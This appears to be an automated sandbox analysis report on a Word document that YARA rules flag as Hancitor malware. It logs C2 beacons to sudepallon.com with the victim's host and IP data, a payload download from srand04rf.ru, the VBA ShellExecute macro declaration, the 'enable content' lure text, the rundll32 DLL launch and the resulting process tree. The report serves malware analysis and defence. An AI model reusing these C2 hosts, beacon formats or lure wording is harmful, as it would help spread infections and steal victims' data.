                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 112Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.1(x64)
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_021128D0 lstrlenA,lstrlenA,InternetCrackUrlA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AE9CCB3-349E-46EF-BF24-C3A751787722}.tmpJump to behavior
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /7hfjsdfjks.exe HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: srand04rf.ruCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /?format=xml HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: api.ipify.orgConnection: Keep-Alive
                Source: svchost.exe, 00000005.00000002.2168632180.000000000066D000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
                Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                Source: svchost.exe, 00000005.00000002.2168632180.000000000066D000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                Source: unknownDNS traffic detected: queries for: api.ipify.org
                Source: unknownHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 105Cache-Control: no-cacheData Raw: 47 55 49 44 3d 37 34 36 39 35 35 36 38 36 30 38 30 32 38 32 33 34 30 34 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 33 39 30 31 32 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 30 2e 30 2e 30 2e 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=7469556860802823404&BUILD=0707_wvcr&INFO=390120 @ user-PC\user&EXT=&IP=0.0.0.0&TYPE=1&WIN=6.1(x64)
                Source: rundll32.exe, 00000003.00000002.2345695857.0000000000295000.00000004.00000020.sdmpString found in binary or memory: http://anspossthrly.ru/8/forum.php
                Source: rundll32.exeString found in binary or memory: http://api.ipify.org
                Source: svchost.exe, 00000005.00000002.2168568117.0000000000624000.00000004.00000020.sdmpString found in binary or memory: http://api.ipify.org/?format=xml
                Source: rundll32.exe, 00000003.00000003.2143615894.00000000003A0000.00000040.00000001.sdmp, rundll32.exe, 00000003.00000002.2346335885.0000000002114000.00000002.00020000.sdmpString found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
                Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                Source: rundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                Source: rundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                Source: rundll32.exe, 00000003.00000002.2346967609.0000000003240000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.2169398406.00000000035D0000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
                Source: rundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                Source: rundll32.exe, 00000003.00000002.2345695857.0000000000295000.00000004.00000020.sdmpString found in binary or memory: http://sudepallon.com/8/forum.php
                Source: rundll32.exe, 00000003.00000002.2345695857.0000000000295000.00000004.00000020.sdmpString found in binary or memory: http://thentabecon.ru/8/forum.php
                Source: rundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                Source: rundll32.exe, 00000003.00000002.2346967609.0000000003240000.00000002.00000001.sdmp, svchost.exe, 00000005.00000002.2169398406.00000000035D0000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
                Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                Source: rundll32.exe, 00000002.00000002.2345957826.0000000001F27000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2346094368.0000000001F17000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                Source: rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

                System Summary:

                barindex
                Malicious sample detected (through community Yara rule)Show sources
                Source: 3.3.rundll32.exe.3a4392.0.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                Source: 3.3.rundll32.exe.3a4392.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                Source: 3.2.rundll32.exe.2110000.6.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
                Source: Document image extraction number: 0Screenshot OCR: Enable content button from the yellow bar above
                Source: Document image extraction number: 1Screenshot OCR: Enable editing txjtton from the yellow bar above 0= you have enabled eclmng. please click Engble
                Source: Screenshot number: 12Screenshot OCR: Enable editing txjtton from the yellow bar above Once you have enabled edmng. please cHck Enable
                Source: Screenshot number: 12Screenshot OCR: Enable content button from the yellow bar above a S
                Document contains OLE streams with PE executablesShow sources
                Source: 0708_3355614568218.docStream path 'ObjectPool/_1687137834/\x1Ole10Native' : MZ signature found
                Document contains an embedded VBA macro which may execute processesShow sources
                Source: 0708_3355614568218.docOLE, VBA macro line: Private Declare PtrSafe Function gc Lib "shell32" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
                Document contains an embedded VBA macro with suspicious stringsShow sources
                Source: 0708_3355614568218.docOLE, VBA macro line: Private Declare PtrSafe Function gc Lib "shell32" Alias "ShellExecuteA" (ByVal hwnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
                Office process drops PE fileShow sources
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\nimb.dllJump to dropped file
                Source: C:\Windows\SysWOW64\rundll32.exeProcess Stats: CPU usage > 98%
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 76D20000 page execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004293B0: GetFileInformationByHandle,DeviceIoControl,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02121E10
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0213BB0E
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02131B95
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02132848
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02132068
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0211F0C0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0212F92D
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0213A1C3
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0212B1F0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0213A705
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0212FF50
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0213243C
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0213547B
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02132C68
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02139C81
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040E85F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00415800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040F9C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004122DD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004220F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00425141
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0042D972
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0042F101
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004261C4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004221DF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00430268
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040727F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0042FA0C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040B2F3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0042FB2C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00432BF4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040A3A4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0042F445
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00420408
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00430C08
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_004314CB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00409CE5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0042E4B7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0042057D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00414506
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00406D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00430523
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0042DDCA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00409DD8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0042FE02
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00430E22
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00432E3A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0042E6E2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0042EEA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040A71A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0042EFC5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_0040BFEF
                Source: 0708_3355614568218.docOLE, VBA macro line: Private Sub Document_Open()
                Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_Open
                Source: 0708_3355614568218.docOLE indicator, VBA macros: true
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0212FEF0 appears 51 times
                Source: 3.3.rundll32.exe.3a4392.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                Source: 3.3.rundll32.exe.3a4392.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                Source: 3.2.rundll32.exe.2110000.6.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
                Source: rundll32.exe, 00000002.00000002.2345751253.0000000001D40000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2345952313.0000000001D30000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winDOC@7/14@7/5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00415800 CreateMutexA,LoadLibraryA,URLDownloadToFileA,LoadLibraryA,GetComputerNameW,GetSystemInfo,GlobalMemoryStatusEx,GetTimeZoneInformation,GetLocaleInfoW,CreateToolhelp32Snapshot,Process32First,Process32Next,RegOpenKeyExW,RegEnumKeyExW,RegOpenKeyExW,inet_ntoa,
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$08_3355614568218.docJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\serhershesrhsfesrf
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRC438.tmpJump to behavior
                Source: 0708_3355614568218.docOLE indicator, Word Document stream: true
                Source: 0708_3355614568218.docOLE document summary: title field not present or empty
                Source: 0708_3355614568218.docOLE document summary: edited time not present or 0
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR
                Source: 0708_3355614568218.docVirustotal: Detection: 37%
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' c:\users\user\appdata\roaming\microsoft\templates\niberius.dll,ONOQWPYIEIR
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
                Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: c:\equate\717\862\Kil\Turn\design.pdb source: rundll32.exe, 00000003.00000002.2346397243.000000000213D000.00000002.00020000.sdmp, 0708_3355614568218.doc
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02113580 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0211CB68 push ebp; iretd
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0211E006 push ds; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0213C024 push ds; retf
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0211D829 push ebp; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0211E8BF push esp; iretd
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0212B8E9 push ecx; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0211A964 push edi; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0212FF35 push ecx; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0211CCC8 push ecx; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0211A55A push eax; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0214F2CF push edx; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_02150903 push ecx; retf
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0214D561 push eax; ret
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0214D5E0 push eax; ret
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 5_2_00435E20 push dword ptr [eax+04h]; ret
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\nimb.dllJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
